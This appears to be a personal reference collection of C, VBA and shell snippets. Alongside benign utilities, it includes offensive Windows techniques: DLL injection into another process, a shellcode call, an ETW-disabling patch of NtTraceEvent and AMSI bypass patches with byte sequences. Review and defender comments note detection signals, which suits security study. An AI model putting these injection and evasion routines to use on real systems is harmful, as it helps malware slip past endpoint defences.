Code snippets
Table of contents
- C printf DEBUG macro
- Read a full file
- NtCurrentProcess
- Typedef NTDLL functions
- Inject DLL in process
- Run shellcode
- Patch ETW
- Patch AMSI
- Get process handle by name
- Build MS project from command line
- Auto timeline
C printf DEBUG macro
/* printf-style debug trace. `x` is passed straight through as the printf format
 * string, so it must be a string literal, never runtime data (otherwise this is a
 * format-string bug). `##__VA_ARGS__` is a compiler extension (GCC/Clang/MSVC)
 * that drops the trailing comma when no extra arguments are given. */
#define DEBUG(x, ...) printf(x, ##__VA_ARGS__)
Read a full file
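/*
 * Read the whole file named `filename` into a freshly malloc'd, NUL-terminated
 * buffer and store it in *string. The caller owns the buffer and must free() it.
 *
 * On every failure path (open, size query, allocation, short read) a message is
 * printed, *string is set to NULL and nothing is leaked (the FILE is always
 * closed). The size comes from fseek/ftell, which is reliable for regular files
 * opened in binary mode; ftell returns -1 for non-seekable inputs and that is
 * treated as an error instead of being cast to a huge size_t as before.
 * The data may contain embedded NULs; the terminating byte is at offset fsize.
 */
void readFile(char* filename, char** string) {
    *string = NULL;
    FILE* f = fopen(filename, "rb");
    if (!f) {
        printf("Cannot open the file\n");
        return;
    }
    long fsize = -1;
    if (fseek(f, 0, SEEK_END) == 0) {
        fsize = ftell(f);   /* -1 on error (e.g. a pipe or other non-seekable file) */
    }
    if (fsize < 0 || fseek(f, 0, SEEK_SET) != 0) {
        printf("Cannot determine the file size\n");
        fclose(f);
        return;
    }
    char* buf = (char*)malloc((size_t)fsize + 1);
    if (!buf) {
        printf("Cannot allocate string buffer");
        fclose(f);
        return;
    }
    /* element size 1 so the return value is the byte count; a short read is an error
     * rather than silently handing back a partially-filled buffer */
    size_t got = fread(buf, 1, (size_t)fsize, f);
    fclose(f);
    if (got != (size_t)fsize) {
        printf("Cannot read the full file\n");
        free(buf);
        return;
    }
    buf[fsize] = 0;
    *string = buf;
}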
NtCurrentProcess
/* Pseudo-handle for the calling process, the same value GetCurrentProcess()
 * returns. It is not a real handle: it needs no CloseHandle and only has
 * meaning inside the process that uses it. */
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
Typedef NTDLL functions
/* Function-pointer type for ntdll's native NtSetInformationProcess, which the
 * public SDK headers do not prototype; resolve it at run time and cast to this.
 * NOTE(review): winternl.h spells the information-class enum PROCESSINFOCLASS;
 * confirm which header provides PROCESS_INFORMATION_CLASS in this build. */
typedef NTSTATUS(NTAPI *pNtSetInformationProcess)(
HANDLE ProcessHandle,
PROCESS_INFORMATION_CLASS ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength
);
Inject DLL in process
#include <windows.h>
#include <stdio.h>
/* Load the DLL at path moduleToInject into the process with id processPID by
 * copying the path into that process and starting a remote thread on
 * LoadLibraryA. Returns TRUE once the remote thread exists (after waiting up to
 * 1 s for it), FALSE on any API failure.
 *
 * NOTE(review): neither processHandle nor dllThread is ever closed, so every
 * call leaks two handles, and the OpenProcess result is used without a NULL
 * check. The OpenProcess / VirtualAllocEx / WriteProcessMemory /
 * CreateRemoteThread sequence is the textbook injection pattern that EDR and
 * Sysmon (event 8, CreateRemoteThread) telemetry is built to surface. */
BOOL injectDLL(char *moduleToInject, DWORD processPID) {
// open the target process
HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processPID);
// allocate the memory page to inject the DLL path
void* remoteBuffer = VirtualAllocEx(processHandle, NULL, strlen(moduleToInject) * sizeof(char), MEM_COMMIT, PAGE_READWRITE);
if (!remoteBuffer) {
return FALSE;
}
// inject the dll name
BOOL status = WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)moduleToInject, strlen(moduleToInject) * sizeof(char), NULL);
if (!status) {
return FALSE;
}
// resolve LoadLibraryA (the code below uses the ANSI variant, not LoadLibraryW)
HMODULE kernel32 = GetModuleHandleA("Kernel32.dll");
if (!kernel32) {
return FALSE;
}
PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(kernel32, "LoadLibraryA");
if (!threadRoutine) {
return FALSE;
}
// the remote buffer (DLL path) is the single argument handed to LoadLibraryA
HANDLE dllThread = CreateRemoteThread(processHandle, NULL, 0, threadRoutine, remoteBuffer, 0, NULL);
if (!dllThread) {
return FALSE;
}
// bounded wait; the result is ignored, so TRUE does not mean the DLL loaded
WaitForSingleObject(dllThread, 1000);
return TRUE;
}
Run shellcode
/* Transfer control to entrypointAddress by casting it to a no-argument function
 * pointer and calling it; control only comes back if the code there returns. */
((void(*)())entrypointAddress)();
Patch ETW
/* Overwrite one byte at NtTraceEvent+3 in this process's ntdll with 0xC3 (ret),
 * after switching that byte's page to PAGE_EXECUTE_READWRITE and restoring the
 * previous protection afterwards. The +3 offset is hard-coded and the bytes
 * found there are never verified, and none of the three API results are checked.
 *
 * Defender note: modification of ntdll's exported code in-process is a standard
 * tamper indicator; comparing the in-memory bytes of these exports with the
 * on-disk image surfaces it. */
void patchETW(){
Pvoid NtTraceEvent = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtTraceEvent");
DWORD dwOld;
DWORD retPatch = 0xc3; /* x86 `ret` opcode; only the low byte is copied below */
VirtualProtect((DWORD64)NtTraceEvent + 3, 1, PAGE_EXECUTE_READWRITE, &dwOld);
CopyMemory((DWORD64)NtTraceEvent + 3, &retPatch, 1);
VirtualProtect((DWORD64)NtTraceEvent + 3, 1, dwOld, &dwOld);
}
Patch AMSI
/* Overwrite the first sizeof(amsiPatch) (13) bytes of amsi.dll!AmsiScanBuffer in
 * the process hProc with a fixed byte sequence: NtProtectVirtualMemory to
 * 0x04 (PAGE_READWRITE), NtWriteVirtualMemory, then restore the old protection.
 * The export address is resolved in the calling process (LoadLibraryA loads
 * amsi.dll here), so this assumes amsi.dll is mapped at the same address in hProc.
 * amsiAddr_bk/memPage are separate copies because the protect call presumably
 * rounds them to page boundaries in place. No return value is checked.
 *
 * Defender note: AMSI providers and EDRs commonly verify the prologue bytes of
 * AmsiScanBuffer/AmsiOpenSession against the on-disk image; a mismatch is the
 * detection signal for this class of patch. */
void patchAMSI(OUT HANDLE& hProc) {
void* amsiAddr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiScanBuffer");
char amsiPatch[] = { 0x31, 0xC0, 0x05, 0x4E, 0xFE, 0xFD, 0x7D, 0x05, 0x09, 0x02, 0x09, 0x02, 0xC3 };
DWORD lpflOldProtect = 0;
unsigned __int64 memPage = 0x1000;
void* amsiAddr_bk = amsiAddr;
NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
NtWriteVirtualMemory(hProc, (LPVOID)amsiAddr, (PVOID)amsiPatch, sizeof(amsiPatch), (SIZE_T*)nullptr);
NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
}
/* Same structure as patchAMSI above, but writes a 3-byte sequence over the start
 * of amsi.dll!AmsiOpenSession in hProc: protection to 0x04 (PAGE_READWRITE),
 * NtWriteVirtualMemory, restore. The address is resolved in the calling process
 * and assumed to be identical in hProc; no return value is checked.
 *
 * Defender note: as with AmsiScanBuffer, an in-memory prologue that differs from
 * the on-disk amsi.dll is the indicator to alert on. */
void patchAMSIOpenSession(OUT HANDLE& hProc) {
void* amsiAddr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiOpenSession");
char amsiPatch[] = { 0x48, 0x31, 0xC0 };
DWORD lpflOldProtect = 0;
unsigned __int64 memPage = 0x1000;
void* amsiAddr_bk = amsiAddr;
NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
NtWriteVirtualMemory(hProc, (LPVOID)amsiAddr, (PVOID)amsiPatch, sizeof(amsiPatch), (SIZE_T*)nullptr);
NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
}
Get process handle by name
C
#include <TlHelp32.h>
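/*
 * Find the first running process whose image name equals procName (exact,
 * case-sensitive wide-string compare against szExeFile) and return a handle to
 * it, writing its process id to *PID.
 *
 * Returns NULL when the snapshot cannot be taken, no process matches, or
 * OpenProcess fails for every matching process (*PID then still holds the last
 * matching id). The caller owns the returned handle and must CloseHandle() it.
 * The toolhelp snapshot is released on every path; the original leaked it and
 * also shadowed hProc with an inner declaration.
 *
 * NOTE(review): PROCESS_ALL_ACCESS is far more than most callers need and is
 * refused for protected processes; request the minimal rights for the task.
 */
HANDLE getProcHandlebyName(LPCWCHAR procName, DWORD* PID) {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return NULL;
    }
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);   /* required before Process32First */
    HANDLE hProc = NULL;
    if (Process32First(snapshot, &entry)) {
        do {
            if (wcscmp(entry.szExeFile, procName) != 0) {
                continue;
            }
            *PID = entry.th32ProcessID;
            hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *PID);
            /* a matching process we cannot open is skipped; keep looking for another */
        } while (hProc == NULL && Process32Next(snapshot, &entry));
    }
    CloseHandle(snapshot);
    return hProc;
}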
VBA
' Toolhelp32 declarations used by PIDByProcName: take a process snapshot and walk
' its PROCESSENTRY32 records (PROCESSENTRY32 itself must be declared elsewhere).
' NOTE(review): these are marked PtrSafe but type the snapshot handle as Long;
' on 64-bit Office the handle return/parameter should be LongPtr — confirm
' against the target Office bitness.
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, PE32 As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, PE32 As PROCESSENTRY32) As Long
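' Return the process id of the first running process whose image name contains
' ProcName (case-sensitive substring match via InStr/vbBinaryCompare), or 0 when
' nothing matches or the snapshot cannot be taken.
'
' The result is a Long: process ids are 32-bit and routinely exceed the Integer
' range, so the original Integer return overflowed at run time. The snapshot
' handle is now closed on every path, including the match path, which previously
' used Exit Function and skipped CloseHandle.
Private Function PIDByProcName(ProcName As String) As Long
    Dim PE32 As PROCESSENTRY32
    Dim hSnapshot As Long
    Dim lRet As Long
    Dim found As Long

    found = 0
    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
    If hSnapshot <> INVALID_HANDLE_VALUE Then
        PE32.dwSize = Len(PE32)   ' required before Process32First
        lRet = Process32First(hSnapshot, PE32)
        Do While lRet
            ' InStr gives the 1-based position of ProcName inside szExeFile, 0 when absent
            If InStr(1, PE32.szExeFile, ProcName, vbBinaryCompare) > 0 Then
                found = PE32.th32ProcessID
                Exit Do   ' leave the loop, not the function, so the handle is closed
            End If
            lRet = Process32Next(hSnapshot, PE32)
        Loop
        CloseHandle hSnapshot
    End If
    PIDByProcName = found
End Function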
Build MS project from command line
REM Clean, then build, the project/solution in the current directory in the Release configuration
msbuild /t:Clean,Build /p:Configuration=Release
Auto timeline
Add to the .zshrc
# zsh hook run before each command: prints a dd.mm.yy-HH:MM:SS stamp (plus a
# blank line, since zsh's echo expands "\n") so the transcript has time markers.
preexec() {
    local stamp
    stamp=$(date +%d.%m.%y-%H:%M:%S)
    echo ">> Date : ${stamp}\n"
}
Add to the .zshenv
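# Record a `script` transcript for every top-level interactive shell, named by
# start time plus a random suffix so concurrent shells do not collide.
# SHLVL must be 1: `script` starts a child shell (presumably the reason for the
# check), and without it that child would start yet another transcript.
# The interactive test is new: .zshenv is sourced by every zsh, so without it a
# non-interactive top-level zsh (cron, scripts, GUI launchers) would also be
# wrapped in `script`.
if [[ ${SHLVL} -eq 1 && -o interactive ]]; then
    # `script` does not create missing directories; make sure the target exists
    mkdir -p "${HOME}/.script"
    script "${HOME}/.script/$(date +%d.%m.%y-%H:%M:%S)-$((1 + RANDOM % 1000))"
fi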